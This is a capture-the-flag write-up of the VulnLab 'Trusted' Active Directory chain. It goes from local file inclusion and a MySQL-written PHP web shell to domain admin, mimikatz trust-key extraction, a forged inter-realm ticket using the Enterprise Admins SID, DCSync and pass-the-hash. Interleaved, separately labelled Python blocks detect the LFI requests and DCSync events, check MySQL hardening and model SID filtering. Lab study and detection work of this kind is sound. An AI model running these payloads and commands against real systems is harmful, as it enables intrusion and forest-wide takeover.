Where Notes Work
TRUSTED – VULNLAB
This is the write-up/walkthrough of the TRUSTED chain machine from VULNLAB.
This chain consists of two machines: a child domain and a parent domain.
NMAP SCAN for PARENT Domain: 10.10.133.229
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 13:19:27Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Issuer: commonName=trusteddc.trusted.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
SNIP
| rdp-ntlm-info:
| Target_Name: TRUSTED
| NetBIOS_Domain_Name: TRUSTED
| NetBIOS_Computer_Name: TRUSTEDDC
| DNS_Domain_Name: trusted.vl
| DNS_Computer_Name: trusteddc.trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-12T13:19:39+00:00
Domain: trusted.vl, NetBIOS name: TRUSTEDDC
NMAP SCAN for CHILD Domain: 10.10.133.230
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.151.102/dashboard/
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-12 13:11:47Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http syn-ack Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack
3306/tcp open mysql syn-ack MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 12
| Capabilities flags: 63486
| Some Capabilities: FoundRows, SupportsCompression, LongColumnFlag, SupportsTransactions, Support41Auth, ODBCClient, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, SupportsLoadDataLocal, InteractiveClient, ConnectWithDatabase, Speaks41ProtocolNew, IgnoreSigpipes, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
| Status: Autocommit
| Salt: ;^I3buG?E~l%mw.}NKnj
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
|_ssl-date: 2023-08-12T13:12:08+00:00; +2s from scanner time.
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: LABDC
| DNS_Domain_Name: lab.trusted.vl
| DNS_Computer_Name: labdc.lab.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-12T13:12:00+00:00
Domain: lab.trusted.vl, NetBIOS name: LABDC
Found the child domain DC, LABDC.LAB.TRUSTED.VL, and the parent domain DC, TRUSTEDDC.TRUSTED.VL.
Running gobuster on the child domain (LABDC):
/aux (Status: 403) [Size: 302]
/cgi-bin/ (Status: 403) [Size: 302]
/com1 (Status: 403) [Size: 302]
/com4 (Status: 403) [Size: 302]
/com3 (Status: 403) [Size: 302]
/com2 (Status: 403) [Size: 302]
/con (Status: 403) [Size: 302]
/dashboard (Status: 301) [Size: 342] [--> http://10.10.133.230/dashboard/]
/dev (Status: 301) [Size: 336] [--> http://10.10.133.230/dev/]
/examples (Status: 503) [Size: 402]
/favicon.ico (Status: 200) [Size: 30894]
/img (Status: 301) [Size: 336] [--> http://10.10.133.230/img/]
/licenses (Status: 403) [Size: 421]
/lpt1 (Status: 403) [Size: 302]
/lpt2 (Status: 403) [Size: 302]
/nul (Status: 403) [Size: 302]
/phpmyadmin (Status: 403) [Size: 302]
/prn (Status: 403) [Size: 302]
/secci� (Status: 403) [Size: 302]
/server-info (Status: 403) [Size: 421]
/server-status (Status: 403) [Size: 421]
/webalizer (Status: 403) [Size: 302]
/xampp (Status: 301) [Size: 338] [--> http://10.10.133.230/xampp/]
Browsing the /dev directory found a simple website. On the ABOUT page I saw that it includes the file about.html through a view parameter to render the page content. I tried a file disclosure (local file inclusion) payload and it worked; since this is a Windows machine, I requested the hosts file and its content was returned:
Payload: http://10.10.187.166/dev/index.html?view=C:\Windows\System32\drivers\etc\hosts
Enumerating the /dev directory for more files with gobuster, looking for .php extensions, found db.php. Including db.php only showed "connected successfully" and not its source, because the PHP code is executed when it is included.
gobuster dir -x php -w /usr/share/wordlists/dirb/big.txt -u http://10.10.187.166/dev/
To read the source of db.php, I used the php://filter wrapper with the following path, which returns the file base64-encoded, and decoded it:
http://10.10.187.166/dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php
After decoding the base64, I found the MySQL credentials; since port 3306 is open, I logged in with them:
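Added example (not part of the original write-up): a small Python detector that scans Apache access-log lines for the request patterns used above, namely php:// stream wrappers, ../ traversal (including double URL-encoding) and absolute OS paths in a query parameter. The log lines are constructed samples and the rules are my own; the durable fix on the application side is to map the view parameter through an allowlist of page names instead of passing it to include().

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache "combined" format; they mimic the kind of
# requests described in the write-up but are not copied from any real server log.
SAMPLE_ACCESS_LOG = [
    r'10.8.0.5 - - [12/Aug/2023:13:25:01 +0000] "GET /dev/index.html?view=about.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    r'10.8.0.5 - - [12/Aug/2023:13:25:07 +0000] "GET /dev/index.html?view=C:\Windows\System32\drivers\etc\hosts HTTP/1.1" 200 824 "-" "Mozilla/5.0"',
    r'10.8.0.5 - - [12/Aug/2023:13:25:31 +0000] "GET /dev/index.html?view=php://filter/convert.base64-encode/resource=C:\xampp\htdocs\dev\db.php HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    r'10.8.0.5 - - [12/Aug/2023:13:26:02 +0000] "GET /dev/index.html?view=%2e%2e%2f%2e%2e%2fxampp%2fhtdocs%2fdev%2fdb.php HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    r'10.8.0.9 - - [12/Aug/2023:13:27:10 +0000] "GET /img/logo.png HTTP/1.1" 200 9031 "-" "Mozilla/5.0"',
]

# client - - [timestamp] "METHOD target HTTP/x.y"  (the rest of the line is not needed here)
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# Rule name -> regex applied to each fully URL-decoded query-parameter value.
RULES = {
    "stream_wrapper": re.compile(r'^(php|data|expect|zip|phar|file|glob)://', re.I),
    "path_traversal": re.compile(r'(^|[\\/])\.\.([\\/]|$)'),
    "absolute_os_path": re.compile(r'^([A-Za-z]:[\\/]|/etc/|/proc/|[\\/]windows[\\/])', re.I),
}


def decode_fully(value, rounds=3):
    """Percent-decode until the value stops changing, so %252e%252e (double encoding) is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_value(value):
    """Return the names of all rules the decoded parameter value triggers (in RULES order)."""
    decoded = decode_fully(value)
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_access_log(lines):
    """Return one finding per query parameter whose value looks like file-inclusion abuse."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # unparseable request line; a real pipeline would count these separately
        query = urlsplit(m.group("target")).query
        for param, value in parse_qsl(query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                findings.append({"line_no": line_no, "client": m.group("client"),
                                 "param": param, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"line {f['line_no']}: {f['client']} param={f['param']} -> {', '.join(f['reasons'])}")
```

The php://filter read and the hosts-file read both produce HTTP 200 responses that look like ordinary page views, so the query string, not the status code, is the signal worth alerting on.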
mysql -u root -h 10.10.187.166 -p
Enumerating databases and tables found some users and their MD5 hashes. I tried cracking all of them, but only Robert's hash cracked, giving the password "IHateEric2".
I then used crackmapexec to authenticate over SMB with this credential, but it did not work. Going further, I used MySQL to write a new PHP file into the /dev directory for executing system commands:
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE 'C:/xampp/htdocs/dev/back.php'
Requesting /dev/back.php?c=whoami showed that the web server runs with SYSTEM privileges.
After that, I tried many ways to get a reverse shell, but none worked, so I simply added a new user to the domain and added it to the Administrators group:
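Added example (not part of the original write-up): the SELECT ... INTO OUTFILE step only works because the MySQL account has the FILE privilege and secure_file_priv does not confine server-side file writes. The Python check below parses two constructed my.ini fragments, one with secure_file_priv unset and one pinning it to a directory outside C:\xampp\htdocs, and classifies them; the NULL handling follows MySQL's documented semantics. The fragments and paths are assumptions, not the lab's actual configuration.

```python
import configparser
from pathlib import PureWindowsPath

# Constructed my.ini fragments (not copied from the lab box).
WEAK_MY_INI = """
[mysqld]
port=3306
datadir="C:/xampp/mysql/data"
skip-external-locking
"""

HARDENED_MY_INI = """
[mysqld]
port=3306
datadir="C:/xampp/mysql/data"
secure_file_priv="C:/xampp/mysql/export"
skip-external-locking
"""


def load_mysqld_section(ini_text):
    """Parse a my.ini/my.cnf text and return its [mysqld] section (empty mapping if absent)."""
    parser = configparser.ConfigParser(allow_no_value=True, interpolation=None, strict=False)
    parser.read_string(ini_text)
    return parser["mysqld"] if parser.has_section("mysqld") else {}


def is_under(path, root):
    """True if 'path' equals 'root' or lies inside it (Windows paths, case-insensitive)."""
    p = PureWindowsPath(path)
    r = PureWindowsPath(root)
    return p == r or r in p.parents


def assess_secure_file_priv(ini_text, web_root="C:/xampp/htdocs"):
    """Classify the secure_file_priv setting as ('weak' | 'hardened', explanation)."""
    section = load_mysqld_section(ini_text)
    raw = section.get("secure_file_priv")          # None when absent or given without a value
    value = (raw or "").strip().strip('"')
    if value == "":
        return ("weak", "secure_file_priv is unset/empty: INTO OUTFILE may write to any path "
                        "the mysqld account can reach, including the web root")
    if value.upper() == "NULL":
        return ("hardened", "secure_file_priv=NULL: server-side file import/export is disabled")
    if is_under(value, web_root):
        return ("weak", f"secure_file_priv points inside the web root {web_root}")
    return ("hardened", f"INTO OUTFILE and LOAD DATA are confined to {value}")


if __name__ == "__main__":
    for label, text in (("weak", WEAK_MY_INI), ("hardened", HARDENED_MY_INI)):
        level, why = assess_secure_file_priv(text)
        print(f"{label} config -> {level}: {why}")
```

Pair this check with reviewing the web application's database account: the db.php in the write-up held root credentials, and a dedicated account without the FILE privilege would have made the OUTFILE write impossible regardless of secure_file_priv.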
back.php?c=net user kunal hacker@123 /add /domain
back.php?c=net localgroup Administrators kunal /add /domain
Then I used evil-winrm to connect and also added the user to the Domain Admins group:
evil-winrm -u kunal -p hacker@123 -i 10.10.187.166
PS C:\Users\kunal\Documents> net group "Domain Admins" kunal /add /domain
Got Users.txt on the Administrator Desktop folder.
To enumerate the domain, I uploaded PowerView.ps1 using the evil-winrm upload functionality and connected as the newly created user over RDP.
In the RDP session, I opened PowerShell and imported PowerView.ps1:
. .\PowerView.ps1
OR
Import-Module .\PowerView.ps1
To pivot from the child to the parent domain, I first have to confirm that the trust is bidirectional.
Enumerating the forest shows two domains: trusted.vl, which is the parent, and lab.trusted.vl, which is the child.
Get-ForestDomain
Looking at the trust to the parent domain, I found that it is bidirectional:
Get-DomainTrust
As the TrustDirection is Bidirectional, I can abuse this trust to reach the parent domain, but first I need some tools and information about the domains.
To abuse the trust, I have to collect the SID of the child domain, the SID of the parent domain, and the trust key for the trust in RC4 (NTLM hash) format.
Getting the SIDs of the child and parent domains with PowerView:
#for the current domain, which is the child domain
Get-DomainSID
#for the parent domain, trusted.vl; append -519 (the Enterprise Admins RID) to the parent SID
Get-DomainSID -Domain trusted.vl
Append -519 to the end of the root domain SID.
To retrieve the trust key as an RC4 hash, I uploaded mimikatz.exe using the evil-winrm upload functionality, connected over RDP and opened cmd as administrator:
mimikatz # privilege::debug
mimikatz # lsadump::trust /patch
Always copy the RC4 key from the [ In ] entry only, and check the trust direction. I am pivoting from child to parent, so my trust direction is: [ In ] LAB.TRUSTED.VL → TRUSTED.VL
Download BetterSafetyKatz.exe from here.
After collecting all the details, I used BetterSafetyKatz.exe as Administrator to forge the inter-realm TGT with the following command, saving the ticket to trust_tkt.kirbi for requesting service tickets (TGS) later:
.\BetterSafetyKatz.exe "kerberos::golden /user:administrator /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519 /rc4:6bcc0ff781f2703112cd0f8f0af5763d /service:krbtgt /target:trusted.vl /ticket:C:\users\kunal\documents\trust_tkt.kirbi" "exit"
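Added example (not part of the original write-up): why appending the parent SID with RID 519 works. The forged ticket's PAC carries the child-domain user SID plus an injected SID history, and a DC in trusted.vl accepts the SIDs as presented unless SID filtering (quarantine) strips SIDs that the trusted domain did not issue. SID filtering is enabled by default on external and forest trusts, which is what blocks this across forests, but not between parent and child domains of one forest, since the forest, not the domain, is the security boundary. The Python model below uses the two domain SIDs from the write-up and is a simplified version of the filtering rule (a real DC also has special handling for well-known and enterprise SIDs).

```python
import re

# A domain SID (S-1-5-21-x-y-z) followed by one RID.
SID_RE = re.compile(r'^S-1-5-21(?:-\d+){3}-(\d+)$')

CHILD_SID = "S-1-5-21-2241985869-2159962460-1278545866"    # lab.trusted.vl (from the write-up)
PARENT_SID = "S-1-5-21-3576695518-347000760-3731839591"    # trusted.vl (from the write-up)
ENTERPRISE_ADMINS_RID = 519


def split_sid(sid):
    """Return (domain_sid, rid) for a domain-relative SID; raise ValueError otherwise."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID with RID: {sid}")
    return sid.rsplit("-", 1)[0], int(m.group(1))


def pac_sids(user_rid, user_domain_sid, sid_history):
    """SIDs a PAC carries: the user's own SID plus whatever SID history it claims."""
    return [f"{user_domain_sid}-{user_rid}", *sid_history]


def apply_sid_filtering(presented_sids, trusted_domain_sid, filtering_enabled):
    """Simplified quarantine rule: keep only SIDs whose domain part is the trusted domain's SID."""
    if not filtering_enabled:
        return list(presented_sids)
    return [s for s in presented_sids if split_sid(s)[0] == trusted_domain_sid]


def grants_enterprise_admin(accepted_sids, root_domain_sid):
    """True if the token the receiving DC builds contains <root SID>-519."""
    return f"{root_domain_sid}-{ENTERPRISE_ADMINS_RID}" in accepted_sids


def evaluate(filtering_enabled):
    """Ticket from lab.trusted.vl claiming trusted.vl's Enterprise Admins SID, as in the write-up."""
    presented = pac_sids(500, CHILD_SID, [f"{PARENT_SID}-{ENTERPRISE_ADMINS_RID}"])
    accepted = apply_sid_filtering(presented, CHILD_SID, filtering_enabled)
    return grants_enterprise_admin(accepted, PARENT_SID)


if __name__ == "__main__":
    for enabled in (False, True):
        print(f"SID filtering {'on ' if enabled else 'off'}: "
              f"Enterprise Admin granted = {evaluate(enabled)}")
```

The point for defenders is that the parent DC never validates the SID history against its own directory; it trusts the child DC's krbtgt-for-trust signature, so anyone holding the trust key (or the child's krbtgt) controls the forest. Monitoring for tickets or logons whose SID history contains a foreign domain's privileged RIDs is the detection counterpart.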
With the ticket saved, I used Rubeus.exe as Administrator to request a service ticket for the HTTP service on the root domain's DC, in order to connect with WinRM:
Rubeus.exe asktgs /ticket:trust_tkt.kirbi /service:http/trusteddc.trusted.vl /dc:trusteddc.trusted.vl /ptt
Checking the ticket using klist command.
klist
Using winrs to connect to trusteddc.trusted.vl
winrs -r:trusteddc.trusted.vl cmd
I tried reading root.txt, but access was denied.
So I copied mimikatz.exe to trusteddc.trusted.vl and dumped the Administrator hash with DCSync:
#copying mimikatz.exe to trusteddc.trusted.vl
copy mimikatz.exe \\trusteddc.trusted.vl\c$
#dumping administrator hash
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /user:trusted\administrator
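Added example (not part of the original write-up): a DCSync like the one above appears on the parent DC as Security event 4662 with the directory replication control-access rights (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) requested by an account that is not a domain controller's computer account. The Python detector below runs over constructed JSON-encoded event records; the account names are assumptions, and the GUIDs are the standard Active Directory extended-rights GUIDs. Accounts that replicate legitimately (for example an Azure AD Connect service account) are passed in via an allowlist.

```python
import json

# Control-access right GUIDs a DCSync requests (standard AD extended-rights GUIDs).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed event records as a SIEM might export them (one JSON object per event); not real log data.
SAMPLE_EVENTS = [
    # the parent DC replicating with its own computer account: normal
    '{"EventID": 4662, "Computer": "trusteddc.trusted.vl", "SubjectUserName": "TRUSTEDDC$", "SubjectDomainName": "TRUSTED",'
    ' "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",'
    ' "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    # the child DC pulling a partial replica as a global catalog: normal
    '{"EventID": 4662, "Computer": "trusteddc.trusted.vl", "SubjectUserName": "LABDC$", "SubjectDomainName": "LAB",'
    ' "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",'
    ' "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}',
    # a user account from the child domain requesting replication rights: DCSync
    '{"EventID": 4662, "Computer": "trusteddc.trusted.vl", "SubjectUserName": "Administrator", "SubjectDomainName": "LAB",'
    ' "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",'
    ' "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    # a 4662 on the domain object that does not involve replication rights: unrelated
    '{"EventID": 4662, "Computer": "trusteddc.trusted.vl", "SubjectUserName": "jdoe", "SubjectDomainName": "TRUSTED",'
    ' "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",'
    ' "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"}',
    # a directory-sync service account (hypothetical name) that is allowed to replicate
    '{"EventID": 4662, "Computer": "trusteddc.trusted.vl", "SubjectUserName": "MSOL_1a2b3c", "SubjectDomainName": "TRUSTED",'
    ' "ObjectType": "%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "AccessMask": "0x100",'
    ' "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}',
    # a logon event: ignored by this rule
    '{"EventID": 4624, "Computer": "trusteddc.trusted.vl", "SubjectUserName": "-", "SubjectDomainName": "-"}',
]


def replication_rights_in(properties):
    """Names of the replication rights referenced in a 4662 Properties field (in table order)."""
    text = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in text]


def detect_dcsync(event_lines, dc_domain, allowed_accounts=()):
    """Flag 4662 events where a non-computer account requested directory replication rights."""
    allowed = {a.upper() for a in allowed_accounts}
    alerts = []
    for raw in event_lines:
        ev = json.loads(raw)
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue
        user = ev.get("SubjectUserName", "")
        domain = ev.get("SubjectDomainName", "")
        account = f"{domain}\\{user}".upper()
        if user.endswith("$"):
            continue  # computer accounts: DCs and GCs from other domains replicate legitimately
        if account in allowed:
            continue
        alerts.append({
            "computer": ev.get("Computer"),
            "account": account,
            "rights": rights,
            "foreign_domain": domain.upper() != dc_domain.upper(),
        })
    return alerts


if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS, dc_domain="TRUSTED", allowed_accounts={"TRUSTED\\MSOL_1a2b3c"}):
        print(f"{a['computer']}: {a['account']} requested {', '.join(a['rights'])}"
              f"{' (foreign domain)' if a['foreign_domain'] else ''}")
```

The computer-account exemption is a heuristic: a compromised machine account would slip past it, so a tighter rule compares the subject against the actual list of DC and GC computer accounts instead of the trailing "$". The foreign_domain flag is what makes the write-up's case stand out, since the replication request on trusteddc came from an Administrator account in LAB rather than TRUSTED.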
With the Administrator hash, I used evil-winrm's pass-the-hash option to log in as Administrator and read root.txt:
evil-winrm -u administrator -H "ADMINISTRATOR-HASH-HERE" -i PARENT-DOMAIN-IP
If you face any problems, let me know in the comments.